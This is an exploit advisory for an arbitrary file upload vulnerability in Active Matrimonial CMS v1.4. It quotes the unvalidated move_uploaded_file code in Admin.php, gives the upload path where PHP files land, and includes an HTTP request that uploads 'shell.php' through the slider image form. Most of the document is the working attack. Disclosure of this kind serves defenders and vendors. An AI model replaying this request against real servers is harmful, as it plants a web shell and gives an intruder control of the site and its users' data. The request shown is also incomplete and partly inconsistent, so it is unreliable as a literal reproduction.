# Exploit Title: Active Matrimonial CMS v1.4 - Arbitrary File Upload
# Date: 13/08/2018
# Exploit Author: N4TuraL
# Vendor Homepage: https://activeitzone.com/
# Greetz: Cyber Warrior - Bug Researchers
###############################################################################
### Description : ###
"/admin/frontend_appearances/pages" application provides a functionality to upload 'png, jpg, jpeg etc.' image
Attacker can upload malicious files because associated formats application does not properly validate
### Vulnerable Code : ###
File location = "application/controllers/Admin.php"
if ($in_db == 'no') {
$totally_new[] = array('index' => $i, 'img' => $img);
}
move_uploaded_file($_FILES['nimg']['tmp_name'][$i], 'uploads/home_page/slider_image/' . $img);
/*$config1['image_library'] = 'gd2';
$config1['create_thumb'] = TRUE;
$config1['maintain_ratio'] = TRUE;
$config1['width'] = '400';
$config1['height'] = '400';
$config1['source_image'] = 'uploads/home_page/slider_image/' . $img;
$this->image_lib->initialize($config1);
$this->image_lib->resize();
$this->image_lib->clear();*/
### Proof of Concept : ###
../uploads/home_page/slider_image/slider_image_x.php
### Request : ###
Host: targetIP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------41184676334
Content-Length: 43114
slider_status=on&home_search_style=1&searching_heading=Search Your Soul Mates&slider_position=right&nimg[0]=&cnt[0]=3&nimg[1]=&nimg[2]=&nimg[3]=shell.php&cnt[3]=
